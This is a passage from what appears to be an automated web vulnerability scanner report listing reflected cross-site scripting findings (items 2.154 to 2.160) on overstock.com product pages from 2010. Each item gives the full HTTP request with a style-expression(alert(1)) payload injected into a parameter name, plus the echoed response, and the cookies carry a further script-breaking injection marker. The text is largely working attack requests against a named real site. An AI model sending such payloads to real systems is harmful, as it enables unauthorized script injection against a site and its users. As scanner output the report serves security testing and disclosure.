The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d1cb"style%3d"x%3aexpression(alert(1))"53fd88e1ab5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3d1cb"style="x:expression(alert(1))"53fd88e1ab5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Bella-Chaise-Berry/4068267/product.html?3d1cb"style%3d"x%3aexpression(alert(1))"53fd88e1ab5=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:21:12 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:21:13 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406072971:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4068267|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:21:13 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:21:13 GMT; Path=/
Keep-Alive: timeout=5, max=25
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108958

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Be
...[SNIP]...
<input type="hidden" name="3d1cb"style="x:expression(alert(1))"53fd88e1ab5" value="1"/>
...[SNIP]...

2.154. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28664"style%3d"x%3aexpression(alert(1))"2a92a237479 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28664"style="x:expression(alert(1))"2a92a237479 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html?28664"style%3d"x%3aexpression(alert(1))"2a92a237479=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:20:47 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:20:47 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4068266|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:20:47 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406047717:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:20:47 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108166

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Be
...[SNIP]...
<input type="hidden" name="28664"style="x:expression(alert(1))"2a92a237479" value="1"/>
...[SNIP]...

2.155. http://www.overstock.com/Home-Garden/Bella-Sea-Foam-Brooks-Sofa/4754971/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bella-Sea-Foam-Brooks-Sofa/4754971/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f699e"style%3d"x%3aexpression(alert(1))"06c80db439f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f699e"style="x:expression(alert(1))"06c80db439f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Bella-Sea-Foam-Brooks-Sofa/4754971/product.html?f699e"style%3d"x%3aexpression(alert(1))"06c80db439f=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:20:48 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:20:48 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:20:48 GMT; Path=/
Set-Cookie: mxcproclicks=4754971|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:20:48 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406048184:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Be
...[SNIP]...
<input type="hidden" name="f699e"style="x:expression(alert(1))"06c80db439f" value="1"/>
...[SNIP]...

2.156. http://www.overstock.com/Home-Garden/Black-Wood-Corner-Computer-Desk/2648511/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Black-Wood-Corner-Computer-Desk/2648511/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 185b5"style%3d"x%3aexpression(alert(1))"71644a27043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 185b5"style="x:expression(alert(1))"71644a27043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Black-Wood-Corner-Computer-Desk/2648511/product.html?185b5"style%3d"x%3aexpression(alert(1))"71644a27043=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:26:52 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:26:52 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=2648511|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:26:52 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406412538:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:26:52 GMT; Path=/
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107285

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Bl
...[SNIP]...
<input type="hidden" name="185b5"style="x:expression(alert(1))"71644a27043" value="1"/>
...[SNIP]...

2.157. http://www.overstock.com/Home-Garden/Black-and-White-Wing-Recliner/4692750/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Black-and-White-Wing-Recliner/4692750/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ebb4"style%3d"x%3aexpression(alert(1))"ef714e226b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ebb4"style="x:expression(alert(1))"ef714e226b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Black-and-White-Wing-Recliner/4692750/product.html?6ebb4"style%3d"x%3aexpression(alert(1))"ef714e226b7=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:50:11 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:50:11 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404211714:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4692750|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:50:11 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:50:11 GMT; Path=/
Keep-Alive: timeout=5, max=47
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106943

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Bl
...[SNIP]...
<input type="hidden" name="6ebb4"style="x:expression(alert(1))"ef714e226b7" value="1"/>
...[SNIP]...

2.158. http://www.overstock.com/Home-Garden/Blooming-Prairie-3-Piece-Quilt-Set/3707290/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Blooming-Prairie-3-Piece-Quilt-Set/3707290/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe84a"style%3d"x%3aexpression(alert(1))"ca3383fac81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe84a"style="x:expression(alert(1))"ca3383fac81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Blooming-Prairie-3-Piece-Quilt-Set/3707290/product.html?fe84a"style%3d"x%3aexpression(alert(1))"ca3383fac81=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:48:57 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:48:57 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3707290|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:48:57 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407737223:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:48:57 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=41
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 116127

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Bl
...[SNIP]...
<input type="hidden" name="fe84a"style="x:expression(alert(1))"ca3383fac81" value="1"/>
...[SNIP]...

2.159. http://www.overstock.com/Home-Garden/Bodipedic-10-inch-Queen-size-Memory-Foam-Mattress-and-Cover-Set/1150841/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bodipedic-10-inch-Queen-size-Memory-Foam-Mattress-and-Cover-Set/1150841/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cba57"style%3d"x%3aexpression(alert(1))"8420a7840b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cba57"style="x:expression(alert(1))"8420a7840b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Bodipedic-10-inch-Queen-size-Memory-Foam-Mattress-and-Cover-Set/1150841/product.html?cba57"style%3d"x%3aexpression(alert(1))"8420a7840b1=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:23:24 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:23:24 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=1150841|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:23:24 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406204584:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:23:24 GMT; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 124276

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Bo
...[SNIP]...
<input type="hidden" name="cba57"style="x:expression(alert(1))"8420a7840b1" value="1"/>
...[SNIP]...

2.160. http://www.overstock.com/Home-Garden/Bodipedic-3-inch-Memory-Foam-Topper-and-Cover-Set/4107143/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bodipedic-3-inch-Memory-Foam-Topper-and-Cover-Set/4107143/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6beca"style%3d"x%3aexpression(alert(1))"46bb046a4c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6beca"style="x:expression(alert(1))"46bb046a4c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Bodipedic-3-inch-Memory-Foam-Topper-and-Cover-Set/4107143/product.html?6beca"style%3d"x%3aexpression(alert(1))"46bb046a4c0=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:43:20 GMT
